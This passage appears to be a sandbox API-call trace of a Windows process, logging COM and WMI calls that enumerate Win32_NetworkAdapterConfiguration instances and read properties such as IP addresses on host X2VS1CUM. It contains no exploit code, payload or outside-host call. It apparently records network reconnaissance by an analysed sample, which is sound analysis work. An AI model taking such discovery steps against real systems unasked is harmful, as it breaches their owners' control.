	[0127.560] CoGetObjectContext (in: riid=0xd7ef71d2a8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7ef71d2a0 | out: ppv=0xd7ef71d2a0*=0x2ad205dbe30) returned 0x0
	[0127.560] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2ad205dbe30, pAptType=0xd7ef71d2c0 | out: pAptType=0xd7ef71d2c0*=1) returned 0x0
	[0127.560] IUnknown:QueryInterface (in: This=0x2ad205dbe30, riid=0x2ad238546d8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0xd7ef71d3c8 | out: ppvObject=0xd7ef71d3c8*=0x0) returned 0x80004002
	[0127.560] IUnknown:Release (This=0x2ad205dbe30) returned 0x2
	[0127.561] CoGetClassObject (in: rclsid=0x2ad3bb03848*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf57cd250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7ef71c930 | out: ppv=0xd7ef71c930*=0x2ad3bb1ee80) returned 0x0
	[0127.561] WbemDefPath:IUnknown:QueryInterface (in: This=0x2ad3bb1ee80, riid=0x7ffbf57cd2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xd7ef71c640 | out: ppvObject=0xd7ef71c640*=0x0) returned 0x80004002
	[0127.561] WbemDefPath:IClassFactory:CreateInstance (in: This=0x2ad3bb1ee80, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c628 | out: ppvObject=0xd7ef71c628*=0x2ad3bb12b00) returned 0x0
	[0127.561] IUnknown:QueryInterface (in: This=0x2ad3bb12b00, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c530 | out: ppvObject=0xd7ef71c530*=0x2ad3bb12b00) returned 0x0
	[0127.561] IUnknown:QueryInterface (in: This=0x2ad3bb12b00, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71c5b0 | out: ppvObject=0xd7ef71c5b0*=0x0) returned 0x80004002
	[0127.561] IUnknown:AddRef (This=0x2ad3bb12b00) returned 0x3
	[0127.561] CoGetContextToken (in: pToken=0xd7ef71c200 | out: pToken=0xd7ef71c200) returned 0x0
	[0127.561] IUnknown:QueryInterface (in: This=0x2ad3bb12b00, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c1c0 | out: ppvObject=0xd7ef71c1c0*=0x2ad3bb1edc0) returned 0x0
	[0127.561] IMarshal:GetUnmarshalClass (in: This=0x2ad3bb1edc0, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xd7ef71c1f0 | out: pCid=0xd7ef71c1f0) returned 0x0
	[0127.561] IUnknown:Release (This=0x2ad3bb1edc0) returned 0x3
	[0127.562] CoGetContextToken (in: pToken=0xd7ef71c1d0 | out: pToken=0xd7ef71c1d0) returned 0x0
	[0127.562] IUnknown:AddRef (This=0x2ad3bb12b00) returned 0x4
	[0127.562] IUnknown:QueryInterface (in: This=0x2ad3bb12b00, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c2e8 | out: ppvObject=0xd7ef71c2e8*=0x0) returned 0x80004002
	[0127.562] IUnknown:Release (This=0x2ad3bb12b00) returned 0x3
	[0127.563] IUnknown:Release (This=0x2ad3bb12b00) returned 0x2
	[0127.563] WbemDefPath:IUnknown:Release (This=0x2ad3bb1ee80) returned 0x0
	[0127.563] IUnknown:Release (This=0x2ad3bb12b00) returned 0x1
	[0127.563] CoGetContextToken (in: pToken=0xd7ef71cf00 | out: pToken=0xd7ef71cf00) returned 0x0
	[0127.563] CoGetContextToken (in: pToken=0xd7ef71ce40 | out: pToken=0xd7ef71ce40) returned 0x0
	[0127.563] IUnknown:AddRef (This=0x2ad3bb12b00) returned 0x2
	[0127.563] IUnknown:QueryInterface (in: This=0x2ad3bb12b00, riid=0xd7ef71cf80*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xd7ef71cf60 | out: ppvObject=0xd7ef71cf60*=0x2ad3bb12b00) returned 0x0
	[0127.563] IUnknown:Release (This=0x2ad3bb12b00) returned 0x2
	[0127.563] IUnknown:Release (This=0x2ad3bb12b00) returned 0x1
	[0127.563] CoGetContextToken (in: pToken=0xd7ef71d080 | out: pToken=0xd7ef71d080) returned 0x0
	[0127.563] CoGetContextToken (in: pToken=0xd7ef71cfc0 | out: pToken=0xd7ef71cfc0) returned 0x0
	[0127.563] IUnknown:AddRef (This=0x2ad3bb12b00) returned 0x2
	[0127.563] IUnknown:QueryInterface (in: This=0x2ad3bb12b00, riid=0xd7ef71d100*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xd7ef71d0e0 | out: ppvObject=0xd7ef71d0e0*=0x2ad3bb12b00) returned 0x0
	[0127.564] IUnknown:Release (This=0x2ad3bb12b00) returned 0x2
	[0127.564] IUnknown:AddRef (This=0x2ad3bb12b00) returned 0x3
	[0127.564] IWbemPath:SetText (This=0x2ad3bb12b00, uMode=0x4, pszPath="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=2") returned 0x0
	[0127.564] IUnknown:Release (This=0x2ad3bb12b00) returned 0x2
	[0127.564] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71d340 | out: puCount=0xd7ef71d340*=0x2) returned 0x0
	[0127.564] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71d340*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71d340*=0x17, pszText=0x0) returned 0x0
	[0127.564] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71d340*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71d340*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.564] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71cde0 | out: puCount=0xd7ef71cde0*=0x2) returned 0x0
	[0127.564] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71cde0*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71cde0*=0x17, pszText=0x0) returned 0x0
	[0127.564] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71cde0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71cde0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.564] IWbemClassObject:Get (in: This=0x2ad206a52b0, wszName="__NAMESPACE", lFlags=0, pVal=0xd7ef71cdd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cdcc*=0, plFlavor=0xd7ef71cdc8*=0 | out: pVal=0xd7ef71cdd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0xd7ef71cdcc*=8, plFlavor=0xd7ef71cdc8*=64) returned 0x0
	[0127.564] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0127.564] IWbemClassObject:Get (in: This=0x2ad206a52b0, wszName="__NAMESPACE", lFlags=0, pVal=0xd7ef71cde0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cddc*=8, plFlavor=0xd7ef71cdd8*=64 | out: pVal=0xd7ef71cde0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0xd7ef71cddc*=8, plFlavor=0xd7ef71cdd8*=64) returned 0x0
	[0127.564] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0127.564] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71cde0 | out: puCount=0xd7ef71cde0*=0x2) returned 0x0
	[0127.564] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71cde0*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71cde0*=0x17, pszText=0x0) returned 0x0
	[0127.564] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71cde0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71cde0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.564] IWbemClassObject:Get (in: This=0x2ad206a52b0, wszName="__CLASS", lFlags=0, pVal=0xd7ef71cdd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cdcc*=0, plFlavor=0xd7ef71cdc8*=0 | out: pVal=0xd7ef71cdd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0xd7ef71cdcc*=8, plFlavor=0xd7ef71cdc8*=64) returned 0x0
	[0127.564] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0127.564] IWbemClassObject:Get (in: This=0x2ad206a52b0, wszName="__CLASS", lFlags=0, pVal=0xd7ef71cde0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cddc*=8, plFlavor=0xd7ef71cdd8*=64 | out: pVal=0xd7ef71cde0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0xd7ef71cddc*=8, plFlavor=0xd7ef71cdd8*=64) returned 0x0
	[0127.564] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0127.565] IWbemClassObject:GetNames (in: This=0x2ad206a52b0, wszQualifierName=0x0, lFlags=48, pQualifierVal=0xd7ef71c868*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0xd7ef71c860 | out: pNames=0xd7ef71c860*="\x01ƀ\x08") returned 0x0
	[0127.565] SafeArrayGetDim (psa=0x2ad3bb041d0) returned 0x1
	[0127.565] IWbemClassObject:Get (in: This=0x2ad206a52b0, wszName="__GENUS", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0xd7ef71c85c*=3, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.565] IWbemClassObject:Get (in: This=0x2ad206a52b0, wszName="__CLASS", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.565] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0127.566] IWbemClassObject:Get (in: This=0x2ad206a52b0, wszName="__SUPERCLASS", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.566] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0127.566] IWbemClassObject:Get (in: This=0x2ad206a52b0, wszName="__DYNASTY", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.566] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0127.566] IWbemClassObject:Get (in: This=0x2ad206a52b0, wszName="__RELPATH", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration.Index=2", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.566] SysStringLen (param_1="Win32_NetworkAdapterConfiguration.Index=2") returned 0x29
	[0127.567] IWbemClassObject:Get (in: This=0x2ad206a52b0, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d, varVal2=0x0), pType=0xd7ef71c85c*=3, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.567] IWbemClassObject:Get (in: This=0x2ad206a52b0, wszName="__DERIVATION", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad3bb045d0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad3bac2d50, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0xd7ef71c85c*=8200, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.567] IWbemClassObject:Get (in: This=0x2ad206a52b0, wszName="__SERVER", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="X2VS1CUM", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.567] SysStringLen (param_1="X2VS1CUM") returned 0x8
	[0127.567] IWbemClassObject:Get (in: This=0x2ad206a52b0, wszName="__NAMESPACE", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.567] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0127.568] IWbemClassObject:Get (in: This=0x2ad206a52b0, wszName="__PATH", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=2", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.568] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=2") returned 0x3f
	[0127.568] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71c900 | out: puCount=0xd7ef71c900*=0x2) returned 0x0
	[0127.568] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c900*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71c900*=0x17, pszText=0x0) returned 0x0
	[0127.568] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c900*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71c900*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.568] IWbemClassObject:Get (in: This=0x2ad206a52b0, wszName="IPAddREss", lFlags=0, pVal=0xd7ef71c8f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c8ec*=0, plFlavor=0xd7ef71c8e8*=0 | out: pVal=0xd7ef71c8f0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c8ec*=8200, plFlavor=0xd7ef71c8e8*=32) returned 0x0
	[0127.568] IWbemClassObject:Get (in: This=0x2ad206a52b0, wszName="IPAddREss", lFlags=0, pVal=0xd7ef71cb20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cb1c*=8200, plFlavor=0xd7ef71cb18*=32 | out: pVal=0xd7ef71cb20*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cb1c*=8200, plFlavor=0xd7ef71cb18*=32) returned 0x0
	[0127.569] CoTaskMemAlloc (cb=0x8) returned 0x2ad3bac2b80
	[0127.569] IEnumWbemClassObject:Next (in: This=0x2ad3bae1500, lTimeout=-1, uCount=0x1, apObjects=0x2ad3bac2b80, puReturned=0xd7ef71d3f8 | out: apObjects=0x2ad3bac2b80*=0x2ad206a7850, puReturned=0xd7ef71d3f8*=0x1) returned 0x0
	[0127.569] IUnknown:QueryInterface (in: This=0x2ad206a7850, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c720 | out: ppvObject=0xd7ef71c720*=0x2ad206a7850) returned 0x0
	[0127.569] IUnknown:QueryInterface (in: This=0x2ad206a7850, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71c7a0 | out: ppvObject=0xd7ef71c7a0*=0x0) returned 0x80004002
	[0127.569] IUnknown:QueryInterface (in: This=0x2ad206a7850, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xd7ef71c538 | out: ppvObject=0xd7ef71c538*=0x0) returned 0x80004002
	[0127.569] IUnknown:AddRef (This=0x2ad206a7850) returned 0x3
	[0127.569] CoGetContextToken (in: pToken=0xd7ef71c3f0 | out: pToken=0xd7ef71c3f0) returned 0x0
	[0127.569] IUnknown:QueryInterface (in: This=0x2ad206a7850, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c3b0 | out: ppvObject=0xd7ef71c3b0*=0x2ad206a7858) returned 0x0
	[0127.569] IMarshal:GetUnmarshalClass (in: This=0x2ad206a7858, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xd7ef71c3e0 | out: pCid=0xd7ef71c3e0) returned 0x0
	[0127.569] IUnknown:Release (This=0x2ad206a7858) returned 0x3
	[0127.570] CoGetContextToken (in: pToken=0xd7ef71c3c0 | out: pToken=0xd7ef71c3c0) returned 0x0
	[0127.570] IUnknown:AddRef (This=0x2ad206a7850) returned 0x4
	[0127.570] IUnknown:QueryInterface (in: This=0x2ad206a7850, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c4d8 | out: ppvObject=0xd7ef71c4d8*=0x0) returned 0x80004002
	[0127.570] IUnknown:Release (This=0x2ad206a7850) returned 0x3
	[0127.570] IUnknown:Release (This=0x2ad206a7850) returned 0x2
	[0127.570] CoGetContextToken (in: pToken=0xd7ef71c880 | out: pToken=0xd7ef71c880) returned 0x0
	[0127.570] CoGetContextToken (in: pToken=0xd7ef71c7c0 | out: pToken=0xd7ef71c7c0) returned 0x0
	[0127.570] IUnknown:AddRef (This=0x2ad206a7850) returned 0x3
	[0127.570] IUnknown:QueryInterface (in: This=0x2ad206a7850, riid=0xd7ef71c900*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xd7ef71c8e0 | out: ppvObject=0xd7ef71c8e0*=0x2ad206a7850) returned 0x0
	[0127.570] IUnknown:Release (This=0x2ad206a7850) returned 0x3
	[0127.570] IUnknown:Release (This=0x2ad206a7850) returned 0x2
	[0127.570] IUnknown:Release (This=0x2ad206a7850) returned 0x1
	[0127.570] CoTaskMemFree (pv=0x2ad3bac2b80) 
	[0127.570] CoGetContextToken (in: pToken=0xd7ef71d200 | out: pToken=0xd7ef71d200) returned 0x0
	[0127.570] IUnknown:AddRef (This=0x2ad206a7850) returned 0x2
	[0127.570] IWbemClassObject:Get (in: This=0x2ad206a7850, wszName="__GENUS", lFlags=0, pVal=0xd7ef71d370*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d36c*=0, plFlavor=0xd7ef71d368*=0 | out: pVal=0xd7ef71d370*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0xd7ef71d36c*=3, plFlavor=0xd7ef71d368*=64) returned 0x0
	[0127.570] IWbemClassObject:Get (in: This=0x2ad206a7850, wszName="__PATH", lFlags=0, pVal=0xd7ef71d310*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d30c*=0, plFlavor=0xd7ef71d308*=0 | out: pVal=0xd7ef71d310*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=3", varVal2=0x0), pType=0xd7ef71d30c*=8, plFlavor=0xd7ef71d308*=64) returned 0x0
	[0127.570] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=3") returned 0x3f
	[0127.571] CoGetObjectContext (in: riid=0xd7ef71d2a8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7ef71d2a0 | out: ppv=0xd7ef71d2a0*=0x2ad205dbe30) returned 0x0
	[0127.571] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2ad205dbe30, pAptType=0xd7ef71d2c0 | out: pAptType=0xd7ef71d2c0*=1) returned 0x0
	[0127.571] IUnknown:QueryInterface (in: This=0x2ad205dbe30, riid=0x2ad238546d8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0xd7ef71d3c8 | out: ppvObject=0xd7ef71d3c8*=0x0) returned 0x80004002
	[0127.571] IUnknown:Release (This=0x2ad205dbe30) returned 0x2
	[0127.572] WbemDefPath:IClassFactory:CreateInstance (in: This=0x2ad3bb1f0c0, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c628 | out: ppvObject=0xd7ef71c628*=0x2ad3bb12440) returned 0x0
	[0127.572] IUnknown:QueryInterface (in: This=0x2ad3bb12440, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c530 | out: ppvObject=0xd7ef71c530*=0x2ad3bb12440) returned 0x0
	[0127.572] IUnknown:QueryInterface (in: This=0x2ad3bb12440, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71c5b0 | out: ppvObject=0xd7ef71c5b0*=0x0) returned 0x80004002
	[0127.572] IUnknown:AddRef (This=0x2ad3bb12440) returned 0x3
	[0127.572] CoGetContextToken (in: pToken=0xd7ef71c200 | out: pToken=0xd7ef71c200) returned 0x0
	[0127.572] IUnknown:QueryInterface (in: This=0x2ad3bb12440, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c1c0 | out: ppvObject=0xd7ef71c1c0*=0x2ad3bb1f1a0) returned 0x0
	[0127.572] IMarshal:GetUnmarshalClass (in: This=0x2ad3bb1f1a0, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xd7ef71c1f0 | out: pCid=0xd7ef71c1f0) returned 0x0
	[0127.572] IUnknown:Release (This=0x2ad3bb1f1a0) returned 0x3
	[0127.572] CoGetContextToken (in: pToken=0xd7ef71c1d0 | out: pToken=0xd7ef71c1d0) returned 0x0
	[0127.572] IUnknown:AddRef (This=0x2ad3bb12440) returned 0x4
